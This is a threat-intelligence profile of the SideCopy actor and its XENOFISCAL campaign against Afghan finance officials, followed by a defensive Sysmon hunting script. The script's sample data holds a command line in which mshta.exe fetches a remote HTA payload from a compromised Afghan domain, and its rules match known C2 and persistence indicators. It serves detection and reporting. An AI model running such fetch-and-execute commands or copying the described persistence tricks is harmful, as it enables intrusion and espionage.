SideCopy
SideCopy is a Pakistan-linked threat actor, assessed in open-source reporting as likely aligned with or an element of the Pakistani government and operating under or alongside the broader Transparent Tribe / APT36 umbrella. Known aliases in the cited reporting are SideCopy and TAG_140; it is also described as a sub-group of APT36, and researchers have tracked it since at least 2019. The group is known for targeting government, military, and diplomatic entities across South Asia. Reporting cited here specifically highlights campaigns against Afghanistan's Ministry of Finance, provincial finance and revenue directorates, and Pashto-speaking government officials, as well as prior targeting in India and expansion into the railway and oil sectors.

Operation XENOFISCAL is attributed to SideCopy with medium-to-high confidence. In that campaign, SideCopy sent spear-phishing emails delivering ZIP archives that contained malicious Pashto-language LNK files disguised as PDFs. The LNK files launched mshta.exe to retrieve remote HTA payloads from compromised Afghan infrastructure, including abimj.edu.af; obfuscated JavaScript and .NET/DLL-based loaders then reconstructed the payload in memory. Execution was fileless, with persistence via a registry Run-key value masquerading as Microsoft Edge under the value name "Edgre" and, in some reporting, a scheduled task named "XenoUpdateManager". The final payload was a customized build of the open-source Xeno RAT (XenoRAT 1.8.7), used for long-term espionage and remote access. Reported XenoRAT capabilities include remote command execution, data theft and exfiltration, file operations, keylogging, screenshot capture, clipboard monitoring, webcam and microphone access, SOCKS5 tunneling, antivirus discovery, dynamic DLL loading, persistence management, and self-uninstall.

The lures were localized in Pashto and used a genuine Afghan Ministry of Finance staff directory as a decoy, indicating prior reconnaissance. Compromised Afghan government or education-hosted infrastructure served the early-stage payloads, blending malicious traffic with legitimate state activity, while command-and-control infrastructure was hosted separately in Europe, including 185.235.137.106. Other reported behaviors include identifying the country location, IP address, and OS version of compromised hosts; sending spear-phishing emails with malicious HTA attachments; luring victims into clicking malicious embedded archive files; and disguising malware with legitimate DLL names such as Duser.dll. In separate activity, SideCopy has been reported deploying Spark RAT, CurlBack RAT, FalseCub, and XenoRAT.
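The chain above leaves four cheap, high-signal artifacts on a host: mshta.exe fetching an HTA over HTTP(S), a Run-key value named "Edgre", a scheduled task named "XenoUpdateManager", and connections to 185.235.137.106. The script below is an added hunting example, not code from the original page, from Mallory, or from any vendor ruleset. It runs those rules over constructed Sysmon-style events (EventID 1 process create, 3 network connect, 13 registry value set) plus Windows Security event 4698 (scheduled task created); the rule names, the edit-distance heuristic for Edge-lookalike value names, the host names and the HTA path in the sample are assumptions, and only the literal indicators come from the reporting.

```python
"""Hunt for the XENOFISCAL-style execution and persistence chain in
Sysmon / Windows Security events.

Added example, not from the original page or any vendor ruleset. Sample
events below are constructed for the demo and mimic Sysmon field names.
Only the literal indicators (mshta.exe + remote HTA, Run-key value "Edgre",
task "XenoUpdateManager", C2 185.235.137.106) come from the reporting; the
rule names, the lookalike heuristic and the sample paths are assumptions.
"""
import re
from dataclasses import dataclass

C2_IPS = {"185.235.137.106"}  # from the reporting
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# Value names a real Edge install might plausibly use (assumed allow-list).
LEGIT_EDGE_NAMES = {"edge", "msedge", "microsoft edge"}


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, used to catch 'Edgre'-style typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def is_edge_lookalike(value_name: str) -> bool:
    """True for a Run-key value name one edit away from an Edge name
    that is not itself an exact, allow-listed name."""
    name = value_name.strip().lower()
    if name in LEGIT_EDGE_NAMES:
        return False
    return any(edit_distance(name, legit) <= 1 for legit in LEGIT_EDGE_NAMES)


def hunt(events: list[dict]) -> list[Finding]:
    """Run the four rules over a list of event dicts and return the matches."""
    findings: list[Finding] = []
    for ev in events:
        host = ev.get("Computer", "?")
        eid = ev.get("EventID")
        if eid == 1:  # process creation: LNK -> mshta.exe pulling a remote HTA
            image = ev.get("Image", "").lower()
            cmd = ev.get("CommandLine", "")
            if image.endswith("\\mshta.exe") and REMOTE_URL.search(cmd):
                findings.append(Finding("mshta_remote_hta", host, cmd))
        elif eid == 13:  # registry value set under a Run key
            target = ev.get("TargetObject", "")
            if RUN_KEY.search(target):
                value_name = target.rsplit("\\", 1)[-1]
                if value_name == "Edgre":  # exact IOC from the reporting
                    findings.append(Finding("runkey_edgre_ioc", host, target))
                elif is_edge_lookalike(value_name):  # generic variant catch
                    findings.append(Finding("runkey_edge_lookalike", host, target))
        elif eid == 3:  # outbound connection to a known C2 address
            ip = ev.get("DestinationIp", "")
            if ip in C2_IPS:
                detail = f"{ev.get('Image')} -> {ip}:{ev.get('DestinationPort')}"
                findings.append(Finding("c2_ip", host, detail))
        elif eid == 4698:  # Security log: a scheduled task was created
            task = ev.get("TaskName", "").lstrip("\\")
            if task.lower() == "xenoupdatemanager":
                findings.append(Finding("schtask_xenoupdatemanager", host, task))
    return findings


# Constructed sample events; the HTA path and host names are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "FIN-WS01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://abimj.edu.af/example.hta'},
    {"EventID": 1, "Computer": "FIN-WS02", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"'},
    {"EventID": 13, "Computer": "FIN-WS01",
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\Edgre"},
    {"EventID": 13, "Computer": "FIN-WS03",
     "TargetObject": r"HKU\S-1-5-21-1001\Software\Microsoft\Windows\CurrentVersion\Run\Edge"},
    {"EventID": 13, "Computer": "FIN-WS04",
     "TargetObject": r"HKU\S-1-5-21-1002\Software\Microsoft\Windows\CurrentVersion\Run\Edgee"},
    {"EventID": 3, "Computer": "FIN-WS01", "Image": r"C:\Users\user\AppData\Roaming\x.exe",
     "DestinationIp": "185.235.137.106", "DestinationPort": 443},
    {"EventID": 4698, "Computer": "FIN-WS01", "TaskName": r"\XenoUpdateManager"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

The second process event (mshta.exe with a local .hta) and the Run value named exactly "Edge" are deliberately left unflagged: mshta.exe with a remote URL argument is the rare and suspicious case, and the lookalike rule is meant to catch the next misspelling the operator picks, not every Edge autostart. Feed it real Sysmon exports by mapping the same field names, and treat a hit on the exact IOCs as a pivot point for the broader behaviors listed above rather than as the whole detection.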
Targeting
Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Government & Administration
Where they target
Geographies tied to known operations.
- 🇦🇫 Afghanistan
Where they're from
Attributed origin per open-source reporting.
- 🇵🇰 Pakistan
Tradecraft
51 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic.
Associated malware families
17 malware families attributed to this actor across reporting.
Associated vulnerabilities
1 CVE this actor has used in observed campaigns; it has been exploited in the wild.
Observables
59 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
- Espionage campaign targeting Afghanistan's government finance apparatus, including the Ministry of Finance and provincial government employees, using spear-phishing and Xeno RAT.
- Conducting a targeted cyber espionage campaign against Afghan government networks, specifically the Afghan Ministry of Finance, using spear-phishing with localized Pashto-language lures to deliver a fileless XenoRAT infection chain and establish persistent remote access.
- Conducting a spear-phishing campaign against Afghanistan government finance entities and Pashto-speaking officials using Xeno RAT for remote access, persistence, monitoring, and data exfiltration.
- Conducting a spear-phishing campaign dubbed Operation XENOFISCAL targeting Afghanistan's Ministry of Finance, provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level government employees; also previously attributed to attacks targeting sectors in India.